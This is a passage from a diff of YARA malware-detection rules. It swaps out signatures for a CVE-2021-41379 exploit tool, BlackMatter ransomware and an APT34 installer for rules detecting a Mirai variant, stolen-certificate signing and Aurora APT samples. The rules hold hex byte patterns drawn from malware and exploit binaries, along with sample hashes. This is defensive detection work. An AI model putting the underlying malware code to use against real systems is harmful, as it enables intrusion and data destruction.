88B??????????4189??E8????????488B??????????483D????????488D????75??EB??0F1F??????488B????4881??????????488D????74??0FB7??488D????48C7??????????31??E8????????498B????498B??????488D????488D????????????BA????????E8????????4885??74??4981??????????????488B????65??33????????????4489??75??4883????5B415C415D5DC3E8????????0F1F??E8????????554889??415541544989??534889??4883????488B??????????65??8B????????????4889????31??E8????????4889??4C89??FF??????????488B??????????4189??E8????????488B??????????483D????????488D????75??EB??0F1F??????488B????4881??????????488D????74??0FB7??488D????48C7??????????31??E8????????498B????498B??????488D????488D????????????BA????????E8????????4885??74??4981??????????????488B????65??33????????????4489??75??4883????5B415C415D5DC3E8????????0F1F??E8????????554889??41574589??415641554189??4154534889??4883????488B??????????4889????4889????4C89????483D????????4C8D????74??4C63??EB??0F1F??????498B????483D????????4C8D????74??498B??4C89??4889??E8????????85??75??4883????5B415C415D415E415F5DC30F1F??????????4589??4C8B????488B????4489??4889??488B????FF??????????4883????5B415C415D415E415F5DC3660F1F??????E8????????554889??41574589??41564D89??41554989??41544189??BA????????534889??488D????4883????4889????4889??65??8B????????????4889????31??E8????????488B??????????4881??????????488D????74??0FB7????4839??75??EB??0F1F????????????410FB7????4839??74??4C8B????4981??????????498D????75??4589??4D89??4C89??4489??4889??488B????FF??????????488B????65??33????????????75??4883????5B415C415D415E415F5DC3660F1F??????31??EB??E8????????0F1F??????662E0F1F????????????E8????????55BF????????4889??4881??????????65??8B????????????4889????31??488D??????????FF????????????B9????????4889??488D??????????F3??A5488D??????????48C7??????????BE????????B1??E8????????4885??74??48BA???????? }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 25KB and all of ( $s* )
+		uint16( 0 ) == 0x457f and filesize < 700KB and all of them
 }
-rule ARKBIRD_SOLG_EXP_CVE_2021_41379_Nov_2021_3 : CVE_2021_41379 FILE
+rule TRELLIX_ARC_Mirai_Casper_Variant : BACKDOOR FILE
 {
 	meta:
-		description = "Detect exploit tool using CVE-2021-41379 (variant 3)"
-		author = "Arkbird_SOLG"
-		id = "c82578d6-63ca-50f6-b105-321791ec8808"
-		date = "2021-11-26"
-		modified = "2021-11-29"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-26/EXP_CVE_2021_41379_Nov_2021_3.yara#L1-L27"
-		license_url = "N/A"
-		logic_hash = "559c4ca0e9ac60e3dd7d5b9a8eb22d887b0b436d4e1fc528e05e7a33ecce0aa6"
+		description = "Rule to detect the Mirai Casper variant"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "0f3a028c-9514-51cd-ad82-415e8ac2dee7"
+		date = "2020-04-17"
+		modified = "2020-08-14"
+		reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_decade_of_RATs.yar#L163-L193"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		hash = "57cc422a6a90c571198a2d1c3db13c31fbdb48ba2f0f4356846d6d636d0f9300"
+		logic_hash = "5449d1ef0c4977c6151fc194ad5f526b6be414c1efb7fd4bacb77d4bcd89c703"
 		score = 75
-		quality = 75
-		tags = "CVE-2021-41379, FILE"
-		hash1 = "0dcda614c0128813bf74802f0e98ffd5ec32a40f35ed42778a5ec5984b5adf47"
-		hash2 = "3c78e07924e1503be1f8785c23d0dd813f04211992cbd6a4955cd0e25c745735"
-		hash3 = "57ec6e15bcc9c79c118f97103815bd74226d4baae334142890a52fbbc5006f1b"
-		hash4 = "9d24383e50e61257c565e47ec073cbb2cd751b6f650f0d542b0643dbe6691b3c"
-		tlp = "white"
-		adversary = "-"
+		quality = 70
+		tags = "BACKDOOR, FILE"
+		rule_version = "v1"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Pwnlnx"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	strings:
-		$s1 = { 8d 0d [2] 03 00 e8 [2] ff ff 41 b8 00 00 00 80 33 d2 33 c9 ff 15 [2] 03 00 48 89 45 08 41 b8 01 00 00 00 48 8d 15 [3] 00 48 8b 4d 08 ff 15 [2] 03 00 48 89 45 28 ff 15 [2] 03 00 3d 24 }
-		$s2 = { 33 d2 48 8b 4d 08 ff 15 [2] 03 00 c7 45 24 00 00 00 00 48 8d 55 24 48 8b 4d 08 ff 15 [2] 03 00 48 8b 4d 08 ff 15 [2] 03 00 ff 15 [2] 03 00 44 8b c0 33 d2 b9 00 10 10 00 ff 15 [2] 03 00 48 89 45 48 48 c7 45 68 00 00 00 00 4c 8d 45 68 ba ff 01 0f 00 48 8b 4d 48 ff 15 [2] 03 00 48 8b 4d 48 ff 15 [2] 03 00 48 c7 85 88 00 00 00 00 00 00 00 48 8d 85 88 00 00 00 48 89 44 24 28 c7 44 24 20 01 00 00 00 41 b9 02 00 00 00 45 33 c0 ba ff 01 0f 00 48 8b 4d 68 ff 15 [2] 03 00 48 8b 4d 68 ff 15 [2] 03 00 41 b9 04 00 00 00 4c 8d 45 24 ba 0c 00 00 00 48 8b 8d 88 00 00 00 ff 15 [2] 03 00 48 8d 85 a8 00 00 00 48 8b f8 33 c0 b9 18 00 00 00 f3 aa 48 8d 85 e0 00 00 00 48 8b f8 33 c0 b9 68 00 00 00 f3 aa c7 85 e0 00 00 00 68 00 00 00 b8 05 00 00 00 66 89 85 20 01 00 00 48 8d 05 [2] 02 00 48 89 85 f0 00 00 00 41 b8 04 01 00 00 48 8d 95 70 01 00 00 48 8d 0d [2] 02 00 ff 15 [2] 03 00 48 8d 85 a8 00 00 00 48 89 44 24 50 48 8d 85 e0 00 00 00 48 89 44 24 48 48 c7 44 24 40 00 00 00 00 48 c7 44 24 38 00 00 00 00 c7 44 24 30 10 00 00 00 c7 44 24 28 00 00 00 00 48 c7 44 24 20 00 00 00 00 45 33 c9 45 33 c0 48 8d 95 70 01 00 00 48 8b 8d 88 00 00 00 ff 15 [2] 03 00 48 8b 8d 88 00 00 00 ff 15 [2] 03 00 48 8b 8d a8 00 00 00 ff 15 [2] 03 00 48 8b 8d b0 00 00 00 ff 15 [2] 03 00 }
-		$s3 = { 41 b8 00 00 00 80 33 d2 33 c9 ff 15 [2] 03 00 48 89 45 08 41 b8 01 00 00 00 48 8d 15 [3] 00 48 8b 4d 08 ff 15 [2] 03 00 48 89 45 28 48 8b 4d 08 ff 15 [2] 03 00 48 c7 45 48 00 00 00 00 c7 45 64 00 00 00 00 4c 8d 4d 64 45 33 c0 48 8b 55 48 48 8b 4d 28 ff 15 [2] 03 00 8b 45 64 48 89 85 88 04 00 00 ff 15 [2] 03 00 48 8b 8d 88 04 00 00 4c 8b c1 ba 0c 00 00 00 48 8b c8 ff 15 [2] 03 00 48 89 45 48 4c 8d 4d 64 44 8b 45 64 48 8b 55 48 48 8b 4d 28 ff 15 [2] 03 00 48 8b 45 48 4c 8b 40 10 ba 04 01 00 00 48 8d 8d 90 00 00 00 ff 15 [2] 03 00 ff 15 [2] 03 00 4c 8b 45 48 33 d2 48 8b c8 ff 15 [2] 03 00 48 8b 4d 28 ff 15 [2] 03 00 c7 85 b4 02 00 00 01 00 00 00 c7 85 d4 02 00 00 00 00 00 }
-		$s4 = { 68 00 00 00 80 6a 00 6a 00 ff 15 24 f0 43 00 3b f4 e8 bf 5b ff ff 89 45 f8 8b f4 6a 01 68 34 84 43 00 8b 45 f8 50 ff 15 20 f0 43 00 3b f4 e8 a2 5b ff ff 89 45 ec 8b f4 ff 15 2c f1 43 00 3b f4 e8 90 5b ff ff 3d 24 }
-		$s5 = { f3 ab a1 0c d0 43 00 33 c5 89 45 fc b9 d9 10 44 00 e8 55 9c ff ff 8b 45 08 89 45 f4 b9 0c 00 00 00 be a4 7e 43 00 8d bd ec f7 ff ff f3 a5 68 d0 07 00 00 6a 00 8d 85 1c f8 ff ff 50 e8 bd 95 ff }
-		$s6 = { 8b f4 6a 00 8b 45 f4 50 ff 15 88 f0 43 00 3b f4 e8 8d 67 ff ff c7 45 e8 00 00 00 00 8b f4 8d 45 e8 50 8b 4d f4 51 ff 15 c8 f0 43 00 3b f4 e8 6f 67 ff ff 8b f4 8b 45 f4 50 ff 15 30 f1 43 00 3b f4 e8 5c 67 ff ff 8b f4 ff 15 a4 f0 43 00 3b f4 e8 4d 67 ff ff 8b f4 50 6a 00 68 00 10 10 00 ff 15 b8 f0 43 00 3b f4 e8 36 67 ff ff 89 45 dc c7 45 d0 00 00 00 00 8b f4 8d 45 d0 50 68 ff 01 0f 00 8b 4d dc 51 ff 15 3c f0 43 00 3b f4 e8 10 67 ff ff 8b f4 8b 45 dc 50 ff 15 30 f1 43 00 3b f4 e8 fd 66 ff ff c7 45 c4 00 00 00 00 8b f4 8d 45 c4 50 6a 01 6a 02 6a 00 68 ff 01 0f 00 8b 4d d0 51 ff 15 38 f0 43 00 3b f4 e8 d4 66 ff ff 8b f4 8b 45 d0 50 ff 15 30 f1 43 00 3b f4 e8 c1 66 ff ff 8b f4 6a 04 8d 45 e8 50 6a 0c 8b 4d c4 51 ff 15 2c f0 43 00 3b f4 e8 a6 66 ff ff 33 c0 89 45 ac 89 45 b0 89 45 b4 89 45 b8 6a 44 6a 00 8d 85 60 ff ff ff 50 e8 36 63 ff ff 83 c4 0c c7 85 60 ff ff ff 44 00 00 00 b8 05 00 00 00 66 89 45 90 c7 85 68 ff ff ff a0 86 43 00 8b f4 68 04 01 00 00 8d 85 50 fd ff ff 50 68 c8 86 43 00 ff 15 58 f1 43 00 3b f4 e8 48 66 ff ff 8b f4 8d 45 ac 50 8d 8d }
-		$s7 = { 40 53 48 81 ec 30 08 00 00 48 8b 05 b8 78 00 00 48 33 c4 48 89 84 24 20 08 00 00 0f 10 05 7e 4e 00 00 48 8b d9 33 d2 0f 10 0d 82 4e 00 00 48 8d 4c 24 50 41 b8 d0 07 00 00 0f 29 44 24 20 0f 10 05 7b 4e 00 00 0f 29 4c 24 30 0f 29 44 24 40 e8 da 42 00 00 4c 8b 03 48 8d 4c 24 20 ba 00 04 00 00 e8 6a f8 ff ff 33 d2 8d 4a 02 ff 15 77 4c 00 00 48 8b 4b 08 48 8d 54 24 20 ff 15 70 4c 00 00 33 c0 48 8b 8c 24 20 08 00 00 48 33 cc e8 de 34 00 00 48 81 c4 30 08 00 00 }
-		$s8 = { 33 d2 48 8b cb ff 15 c6 2c 00 00 83 65 00 00 48 8d 55 00 48 8b cb ff 15 85 2c 00 00 48 8b cb ff 15 1c 2d 00 00 ff 15 86 2c 00 00 33 d2 b9 00 10 10 00 44 8b c0 ff 15 46 2c 00 00 48 83 64 24 68 00 4c 8d 44 24 68 48 8b c8 ba ff 01 0f 00 48 8b d8 ff 15 82 2b 00 00 48 8b cb ff 15 e1 2c 00 00 48 8b 4c 24 68 48 8d 44 24 60 48 83 64 24 60 00 41 b9 02 00 00 00 48 89 44 24 28 45 33 c0 ba ff 01 0f 00 c7 44 24 20 01 00 00 00 ff 15 80 2b 00 00 48 8b 4c 24 68 ff 15 a5 2c 00 00 48 8b 4c 24 60 4c 8d 45 00 41 b9 04 00 00 00 41 8d 51 08 ff 15 1c 2b 00 00 33 c0 48 8d 4d 90 0f 57 c0 48 89 45 80 33 d2 0f 11 44 24 70 8d 58 68 44 8b c3 e8 5b 25 00 00 8d 43 9d 89 5d 90 66 89 45 d0 48 8d 55 10 48 8d 05 e0 33 00 00 41 b8 04 01 00 00 48 8d 0d f3 33 00 00 48 89 45 a0 ff 15 91 2c 00 00 48 8b 4c 24 60 48 8d 44 24 70 48 89 44 24 50 48 8d 55 10 48 8d 45 90 45 33 c9 48 89 44 24 48 45 33 c0 48 83 64 24 40 00 48 83 64 24 38 00 c7 44 24 30 10 00 00 00 83 64 24 28 00 48 83 64 24 20 00 ff 15 9a 2a 00 00 48 8b 4c 24 60 ff 15 ef 2b 00 00 48 8b 4c 24 70 ff 15 e4 2b 00 00 48 8b 4c 24 78 ff 15 d9 }
-		$s9 = { 33 d2 33 c9 41 b8 00 00 00 80 ff 15 ba 33 00 00 41 b8 01 00 00 00 48 8d 15 7d 3b 00 00 48 8b c8 48 8b d8 ff 15 d9 33 00 00 48 8b cb 48 8b f8 ff 15 8d 33 00 00 4c 8d 4c 24 20 89 74 24 20 45 33 c0 33 d2 48 8b cf ff 15 ae 33 00 00 8b 5c 24 20 ff 15 64 34 00 00 44 8b c3 ba 0c 00 00 00 48 8b c8 ff 15 33 34 00 00 44 8b 44 24 20 4c 8d 4c 24 20 48 8b d0 48 8b cf 48 8b d8 ff 15 7a 33 00 00 4c 8b 43 10 48 8d 4c 24 30 ba 04 01 00 00 ff 15 46 37 00 00 ff 15 20 34 00 00 4c 8b c3 33 d2 48 8b c8 ff 15 9a 33 00 00 48 8b cf ff 15 11 33 00 00 48 8d 4c 24 30 8b fe ff 15 a4 33 00 00 83 e8 02 }
+		$bp = { 7F??4C4601??01??000000000000000002??03??01??0000E0??04??34??000088??????????000034??20??05????????????????000000000000000080??????80??????15????????0C??05????????10??????0000??????0C??40A510??40A510??80??????904A0000060000000010????????0000D4??0000D4??04??D4??04??440000??????????????000004??0000070000??????0C??40A510??40A510??14??000030??000004??000004??000051E5??64????000000000000000000000000000000000000060000??????000004??000010??000001??0000474E5500000000????0000????0000????0000??????000014??000003??0000474E55??????3A??87????529723????2C??08??????AB35????????2A??0000BC????????0000????A510??2A??0000C4??????????0000C8??????2A??0000CCA510??2A??00005589??5383????E8????????5B81??????????8B??????????85??74??E8????????E8????????E8????????585BC9C3FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????000000000000000031??5E89??83????50545268????????68????????515668????????E8????????F490909090909090909090909090905589??538D??????80????????????75??BB????????A1????????81??????????C1????83????39??73??908D??????83????A3????????FF????????????A1????????39??72??B8????????85??74??C7????????????E8????????C6????????????8D??????5B5DC3908D??????55B8????????89??8D??????E8????????5A81??????????85??74??89??????C7??????????????C7??????????????C7????????????E8????????A1????????85??74??B8????????85??74??C7????????????FF??C9C39090905589??83????8B????88????A1????????85??74??A1????????0FB6????88??83????A3????????EB??C7??????????????8D????89??????C7????????????E8????????C9C35589??83????EB??8B????0FB6??0FBE??83??????89????E8????????8B????0FB6??84??75??C9C35589??83????8B????0FB6??88????83??????80??????0F84????????80??????74??0FBE????89????E8????????E9????????C7????????????8B????0FB6??88????83??????80??????75??C7????????????8B????0FB6??88????83??????EB??80??????75??C7????????????8B????0FB6??88????83??????C7????????????EB??8B????89??C1????01??01??89??0FBE????8D????83????89????8B????0FB6??88????83??????80??????7E??80??????7E??80??????74??80??????75??83??????8B????0FB6??88????83??????80??????0F84????????0FB6????88????80??????7E??0FB6????83????88????0FBE????83????83????0F87????????8B????????????FF??8B????8D????89????8B??89????C7????????????EB??83??????8B????8B????8D????0FB6??84??75??EB??C7????????????E8????????8B????83????85??75??8B????3B????0F92??83??????84??75??8B????89????E8????????EB??C7????????????E8????????8B????3B????0F92??83??????84??75??E9????????8B????8D????89????8B??0FBE??89????E8????????E9????????C7????????????EB??C7????????????EB??C7????????????EB??C7????????????EB??0FBE????89????E8????????E9????????8B????83????85??74??8B????8D????89????8B??EB??80??????75??8B????8D????89????8B??EB??8B????8D????89????8B??89????80??????75??8B????85??79??F7????83??????C7????????????8B????BA????????F7????89??88????8B????BA????????F7????89????80??????7E??80??????75??B8????????EB??B8????????0FB6????01??88????8B????0FB6????83????88??????83??????83??????74??83??????76??8B????83????85??74??8B????C6????????83??????8B????89????8B????83????84??74??B8????????EB??B8????????88????EB??0FBE????89????E8????????8B????83????85??75??8B????3B????0F92??83??????84??75??83??????8B????0FB6??????0FBE??89????E8????????83??????75??EB??C7????????????E8????????8B????3B????0F92??83??????84??75??E9????????E9????????90EB??90C9C35589??83????8D????89????8B????89??????8B????89????E8????????C9C35589??83????8B????8B????88????88????C9C35589??57565381??????????8B????8B????88??????????88??????????C7??????????????????C7??????????????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????89??????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????89??????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????89??????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????89??????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????89??????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????66????????????8D??????????BA????????89??????C7??????????????89????E8????????83????????????0F84????????83????????????0F84????????8B??????????89????E8????????3D????????0F8F????????8B??????????89????E8????????83????0F8F????????8B??????????89????E8????????83????0F8F????????C7??????????????????EB??8B??????????03??????????0FB6??3C??7E??8B??????????03??????????0FB6??3C??7F??8B??????????03??????????8B??????????03??????????0FB6??83????88??8B??????????83????89??????????8B??????????89????E8????????8B??????????39??7F??81??????????????????7E??C7??????????????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????8B??????????C7??????????????89????E8????????89??????????C7??????????????????E9????????8B??????????69??????????03??????????C6??????8B??????????69??????????03??????????C7??????????8B??????????69??????????89??03??????????0FB6??????????8B??????????89??C1????F7??89??89??89??01??01??C1????03????8B????89????8B??????????69??????????03??????????8D??????????8B??????????89??????89????E8????????8B??????????69??????????03??????????0FB6??????????3C??74??8B??????????69??????????03??????????05????????89????E8????????8B??????????69??????????03??????????8D??????????8B??????????69??????????03??????????81??????????83????89??????89??????89????E8????????8B??????????69??????????03??????????C6????????????8B??????????69??????????03??????????8D??????????8B??????????89??????89????E8????????8B??????????69??????????03??????????8D??????????8B??????????89??????89????E8????????8B??????????69??????????03??????????8D??????????8B??????????89??????89????E8????????0FB6??????????8B??????????89??C1????F7??89??89??89??01??01??C1????03????0FB6????3C??0F87????????8B??????????69??????????89??03??????????0FB6??????????8B??????????89??C1????F7??89??89??89??01??01??C1????03????8B????89????E8????????89??E8????????89??0FB6??????????8B??????????89??C1????F7??89??89??89??01??01??C1????03????0FB6????0FB6??89??89??D3??89??8D????89????E8????????89????E8????????89??BA????????89??F7??89??C1????89??C1????01??89??29??83????0F87????????8B????????????FF??C7????????????E8????????C7??????????????C7????????????E8????????8B??????????69??????????03??????????83????89??????89????E8????????C7????????????E8????????E9????????C7????????????E8????????C7??????????????C7????????????E8????????8B??????????69??????????03??????????83????89??????89????E8????????C7????????????E8????????E9????????C7????????????E8????????C7??????????????C7????????????E8????????8B??????????69??????????03??????????83????89??????89????E8????????C7???????????? }
 
-	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 25KB and 3 of ( $s* )
-}
-rule ARKBIRD_SOLG_RAN_Blackmatter_Aug_2021_1 : FILE
-{
-	meta:
-		description = "Detect BlackMatter ransomware"
-		author = "Arkbird_SOLG"
-		id = "eb308cde-af92-5b34-b256-88009f90810f"
-		date = "2021-08-02"
-		modified = "2021-08-02"
-		reference = "https://twitter.com/abuse_ch/status/1421834305416933376"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-01/Blackmatter/RAN_BlackMatter_Aug_2021_1.yara#L1-L23"
-		license_url = "N/A"
-		logic_hash = "ff158ce977eb10f36c9e8a032dd3880fcd5ecc09e9cc07cd27b98bbce5661d75"
-		score = 50
-		quality = 71
-		tags = "FILE"
-		hash1 = "22d7d67c3af10b1a37f277ebabe2d1eb4fd25afbd6437d4377400e148bcc08d6"
-		hash2 = "7f6dd0ca03f04b64024e86a72a6d7cfab6abccc2173b85896fc4b431990a5984"
-		level = "Experimental"
-		tlp = "white"
-		adversary = "-"
+	condition:
+		uint16( 0 ) == 0x457f and filesize < 3000KB and all of them
+}
 
-	strings:
-		$s1 = { 55 8b ec 81 ec ac 02 00 00 53 51 52 56 57 c7 45 fc 00 00 00 00 c7 45 f4 00 00 00 00 c7 45 f0 00 00 00 00 c7 45 ec 00 00 00 00 6a 00 ff 15 00 15 41 00 85 c0 0f 85 3e 04 00 00 8d 45 d4 50 6a 00 6a 00 6a 00 6a 00 6a 00 ff 15 84 15 41 00 85 c0 0f 85 1c 04 00 00 8d 85 7c ff ff ff c7 00 b1 5f 5a 22 c7 40 04 c8 5f 75 22 c7 40 08 b1 5f 06 22 b9 03 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8b 7d 08 8b 4d d4 8d 45 f8 50 6a 00 6a 00 6a 00 6a 00 6a 02 ff 71 1c ff 15 88 15 41 00 85 c0 75 6d 8d 45 dc 50 6a 00 6a 00 ff 75 f8 ff 15 8c 15 41 00 85 }
-		$s2 = { 8d 45 88 c7 00 a1 5f 42 22 c7 40 04 ac 5f 56 22 c7 40 08 d7 5f 29 22 c7 40 0c c2 5f 45 22 c7 40 10 a3 5f 3b 22 c7 40 14 ae 5f 69 22 c7 40 18 80 5f 76 22 c7 40 1c 98 5f 72 22 c7 40 20 88 5f 74 22 c7 40 24 9e 5f 2a 22 c7 40 28 ed 5f 06 22 b9 0b 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 45 88 50 8d 85 54 fd ff ff 50 ff 15 dc 12 41 00 83 c4 08 ff 75 cc 8d 85 54 fd ff ff 50 ff 15 d8 12 41 00 83 c4 08 8d 45 ec 50 8d 85 5c ff ff ff 50 6a 01 6a 00 6a 00 8d 85 54 fd ff ff 50 ff 15 98 15 41 00 }
-		$s3 = { 8d 45 b4 c7 00 21 0a 83 e9 c7 40 04 c5 ce d7 33 c7 40 08 40 c4 06 e2 c7 40 0c a2 87 fb dd b9 04 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 45 a4 c7 00 6a f9 14 fe c7 40 04 92 2c c9 33 c7 40 08 65 12 06 88 c7 40 0c ed 14 28 06 b9 04 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 45 94 c7 00 75 39 4d 45 c7 40 04 7f b1 d6 33 c7 40 08 40 2e 06 e2 c7 40 0c a2 87 fb dd b9 04 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 45 84 c7 00 99 f9 aa 66 c7 40 04 11 b7 d6 33 c7 40 08 4d 23 06 e2 c7 40 0c a2 e9 8e 02 b9 04 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 85 b8 fe ff ff c7 00 b2 5f 59 22 c7 40 04 bd 5f 74 22 c7 40 08 82 5f 70 22 c7 40 0c 84 5f 62 22 c7 40 10 88 5f 74 22 c7 40 14 ac 5f 74 22 c7 40 18 8e 5f 6e 22 c7 40 1c 84 5f 72 22 c7 40 20 88 5f 65 22 c7 40 24 99 5f 73 22 c7 40 28 9f 5f 63 22 c7 40 2c ed 5f 06 22 b9 0c 00 00 00 81 30 ed 5f 06 22 83 c0 04 49 75 f4 8d 85 6c ff ff ff c7 00 bf 5f 49 22 c7 40 04 a2 5f 52 22 c7 40 08 b1 5f 45 22 c7 40 0c a4 5f 4b 22 c7 40 10 bb 5f 34 22 c7 40 14 ed 5f 06 22 b9 06 00 00 }
-		$s4 = { 8d bd fc fe ff ff 32 c0 aa b9 2a 00 00 00 b0 ff f3 aa b0 3e aa b9 03 00 00 00 b0 ff f3 aa b0 3f aa b9 0a 00 00 00 b0 34 aa fe c0 e2 fb b9 03 00 00 00 b0 ff f3 aa 32 c0 aa b9 03 00 00 00 b0 ff f3 aa }
-		$s5 = { 35 35 35 4f 35 58 35 22 36 35 36 3f 36 2c 37 3f 37 60 37 76 37 }
-		$s6 = { 3d 2b 3d 47 3d 4d 3d 60 3d 67 3d 6d 3d }
-		$s7 = { 8b 0e 0f b6 d1 0f b6 dd 57 8d bd fc fe ff ff 8a 04 3a 8a 24 3b c1 e9 10 83 c6 04 0f b6 d1 0f b6 cd 8a 1c 3a 8a 3c 39 5f 8a d4 8a f3 c0 e0 02 c0 eb 02 c0 e6 06 c0 e4 04 c0 ea 04 0a fe 0a c2 0a e3 88 07 88 7f 02 88 67 01 ff 4d fc }
+rule TRELLIX_ARC_APT_Stolen_Certificates : BACKDOOR FILE
+{
+	meta:
+		description = "Rule to detect samples digitally signed from these stolen certificates"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "57051977-780c-5c8e-bc66-0f1d8b3bbd93"
+		date = "2020-04-17"
+		modified = "2020-08-14"
+		reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_decade_of_RATs.yar#L196-L221"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		hash = "ce3424524fd1f482a0339a3f92e440532cff97c104769837fa6ae52869013558"
+		logic_hash = "9b700e4889349d0203bdd4e00035ee9c9aba5025ccc57eef915b2c78996f8160"
+		score = 75
+		quality = 70
+		tags = "BACKDOOR, FILE"
+		rule_version = "v1"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Pwnlnx"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 25KB and 5 of ( $s* )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "/C=KR/ST=Seoul/L=Gangnam-gu/O=LivePlex Corp/CN=LivePlex Corp" and pe.signatures [ i ] . serial == "3f:55:42:e2:e7:1d:8d:b3:57:04:1c:9d:d4:5b:95:0a" or pe.signatures [ i ] . subject contains "/C=KR/ST=Seoul/L=Gangnam-gu/O=LivePlex Corp/CN=LivePlex Corp" and pe.signatures [ i ] . serial == "3f:55:42:e2:e7:1d:8d:b3:57:04:1c:9d:d4:5b:95:0a" or pe.signatures [ i ] . subject contains "/C=KR/ST=Seoul/L=Gangnam-gu/O=LivePlex Corp/CN=LivePlex Corp" or pe.signatures [ i ] . serial == "3f:55:42:e2:e7:1d:8d:b3:57:04:1c:9d:d4:5b:95:0a" )
 }
-rule ARKBIRD_SOLG_APT_APT34_RDAT_Feb_2021_1 : FILE
+rule TRELLIX_ARC_Apt_Aurora_Pdb_Samples : BACKDOOR FILE
 {
 	meta:
-		description = "Detect Installer from APT34 group"
-		author = "Arkbird_SOLG"
-		id = "32f28376-e792-543b-82f7-36ec627b4fab"
-		date = "2021-02-26"
-		modified = "2021-02-27"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-02-26/APT34/APT_APT34_RDAT_Feb_2021_1.yar#L1-L19"
-		license_url = "N/A"
-		logic_hash = "61ea6eceda0c7d6ec15db87891c4322002c112383c7a4d0089e35db9636bbe73"
-		score = 50
-		quality = 73
-		tags = "FILE"
-		level = "experimental"
-		hash1 = "65a6afc027ff851bd325d8a4f2ab4f326dd8f2c230bfd49a213c5afc00df8e2c"
+		description = "Aurora APT Malware 2006-2010"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "51b080b7-671b-592b-ba52-7fdd0ddf0294"
+		date = "2010-01-11"
+		modified = "2020-08-14"
+		reference = "https://en.wikipedia.org/wiki/Operation_Aurora"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_operation_aurora.yar#L1-L26"
+		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
+		hash = "ce7debbcf1ca3a390083fe5753f231e632017ca041dfa662ad56095a500f2364"
+		logic_hash = "5791ae7b96f2b59d0cca1ab97455bb4745edad8980ac4aff22aa36e0bc4f240e"
+		score = 75
+		quality = 70
+		tags = "BACKDOOR, FILE"
+		rule_version = "v1"
+		malware_type = "backdoor"
+		malware_family = "Backdoor:W32/Aurora"
+		actor_type = "Cybercrime"
+		actor_group = "Unknown"
 
 	strings:
-		$s1 = "XAVVQxcVAVIfCBYWARQfEBldEU4ZF1JbUFJYCgpCTg==" fullword ascii
-		$s2 = { 0b da 89 5c 24 40 40 38 3d 55 56 }
-		$s3 = { 57 4e 44 31 23 31 2e 32 }
-		$s4 = { 63 00 6d 00 64 00 2e 00 65 00 78 00 65 00 20 00 2f 00 63 }
-		$seq_Service = { 4c 8b dc 57 48 81 ec e0 02 00 00 48 c7 44 24 70 fe ff ff ff 49 89 5b 10 49 89 73 18 48 8b 05 65 12 0a 00 48 33 c4 48 89 84 24 d0 02 00 00 48 8b d9 48 89 4c 24 78 41 b8 04 01 00 00 49 8d 93 d8 fd ff ff 33 c9 ff 15 9d 20 07 00 85 c0 75 19 ff 15 33 21 07 00 8b d0 48 8d 0d 8a b6 08 00 e8 1d f7 ff ff e9 a5 01 00 00 33 f6 48 89 b4 24 90 00 00 00 48 89 b4 24 98 00 00 00 45 33 c0 33 d2 48 8d 8c 24 80 00 00 00 e8 d4 9f ff ff 66 39 b4 24 c0 00 00 00 75 05 44 8b c6 eb 1f 48 8d 84 24 c0 00 00 00 49 83 c8 ff 66 0f 1f 84 00 00 00 00 00 49 ff c0 66 42 39 34 40 75 f6 48 8d 94 24 c0 00 00 00 48 8d 8c 24 80 00 00 00 e8 41 05 00 00 90 4c 8b c3 48 8d 8c 24 a0 00 00 00 e8 60 0a 00 00 90 49 83 c9 ff 45 33 c0 48 8b d0 48 8d 8c 24 80 00 00 00 e8 a8 07 00 00 90 45 33 c0 b2 01 48 8d 8c 24 a0 